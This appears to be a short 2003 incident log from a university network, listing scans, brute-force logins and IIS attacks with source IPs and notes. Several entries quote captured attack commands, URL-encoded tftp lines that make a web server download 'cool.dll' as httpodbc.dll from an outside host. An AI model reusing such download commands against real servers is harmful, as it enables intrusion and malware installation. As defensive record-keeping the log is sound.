*SHORT* summary of some of the attacks against us for Feb. 2003 Just too many scans and not enough to keep the list up all the time year - time EASTERN source_ip[:port] (dns name, if any) attack/scan/notes 2003/02/03-05:55:15.00 203.129.254.22 (Internet Systems Group ISG,BANGALOR,IN) 1. attack web servers w/buff overlow cmd: 2003/02/03-05:55:15.00 203.129.254.22 (Internet Systems Group ISG,BANGALOR,IN) 2. tftp%20-i%20132.132.64.247%20GET%20cool.dll%20c:\httpodbc.dll 2003/02/04-12:35:29.54 65.40.197.208 (user208.net512.nj.sprint-hsd.net) pound on prime port 5281 2003/02/04-15:48:14.95 210.186.112.182 (TMnet Telekom Malaysia,MY) ry to login on 132.235.16.100 as root 2003/02/04-16:10:07.24 132.235.79.73 (dhcp-079-073.cns.ohiou.edu) portscan 132.235.1.249 2003/02/04-16:20:30.78 132.235.79.73 (dhcp-079-073.cns.ohiou.edu) portscan 132.235.4.249 2003/02/05-10:20:07.98 65.40.197.208 (user208.net512.nj.sprint-hsd.net)pound on prime port 5281 2003/02/05-10:20:07.98 65.40.197.208 (user208.net512.nj.sprint-hsd.net)pound on prime port 5281 2003/02/05-15:31:03.81 65.40.197.208 (user208.net512.nj.sprint-hsd.net)pound on prime port 5281 2003/02/06-00:12:57.75 128.61.152.107 (elm.psych.gatech.edu) portscan 132.235.1.12 2003/02/06-00:35:28.21 148.245.41.74 (c074.coral.com.mx) scan net for port 23; rlogin buff overflow attack 2003/02/12-13:37:20.41 132.235.241.55 (...ilgard.ohiou.edu) portscan prime 2003/02/13-15:22:03.61 203.129.254.22 () attack web servers w/cmd tftp%20-i%20132.132.64.193%20GET%20cool.dll%20e 2003/02/15-11:37:55.72 12.11.149.5 (ptc-gw.ptc.com) attack web server w/ tftp%20-i%20132.253.180.93%20GET%20cool.dll%20d: 2003/02/20-16:54:47.48 132.235.241.55 (ilgard.ohiou.edu) portscan 132.235.1.12 2003/02/20-15:23:41.87 216.221.81.98 (d221-216-98.systems.cogeco.net) 1. hack into local pc via IIS. ftp to 65.113.83.134 :1969 2003/02/20-15:23:41.87 216.221.81.98 (d221-216-98.systems.cogeco.net) 2. login leech passwd dark to get firedaemon software, etc. 2003/02/20-15:23:41.87 216.221.81.98 (d221-216-98.systems.cogeco.net) 3. ERunAs2X.exe SFind.exe rundllhook.exe... 2003/02/26-15:56:37.07 195.146.229.193 (poold7-193.adsl.nordnet.fr) 1. attack 17.84 via iis. connect to 128.61.46.40 via ftp 2003/02/26-15:56:37.07 195.146.229.193 (poold7-193.adsl.nordnet.fr) 2. login/pass= send/dnes and get /httpodbc.dll /ays.exe 2003/03/05-16:17:40.79 211.20.5.85 (Jing Shing Enterprise Ltd.,TW) 1. Massive attack against bobcat. HTTP overflows, ftp holes, 2003/03/05-16:17:40.79 211.20.5.85 (Jing Shing Enterprise Ltd.,TW) 2. telnet/ssh, tries, stupid root passwd, something about 2003/03/05-16:17:40.79 211.20.5.85 (Jing Shing Enterprise Ltd.,TW) 3. nesssus in login/passwd 2003/03/05-16:17:40.79 211.20.5.85 (Jing Shing Enterprise Ltd.,TW) 4. and email addresses.-maybe nessus scan of bobcat? 2003/03/05-18:24:42.03 132.203.10.101 (poste101-10.sbf.ulaval.ca) 1. scannet for port 1433 2003/03/05-23:37:11.53 132.203.10.101 (poste101-10.sbf.ulaval.ca) 2. attack several ips on port 1433. 2003/03/05-23:37:11.53 132.203.10.101 (poste101-10.sbf.ulaval.ca) 3. thru 2003/03/06-03:54:12.22 2003/03/05-09:25:50.69 132.235.227.94 (dhcp-227-094.cns.ohiou.edu) scannet for ports 138,139,445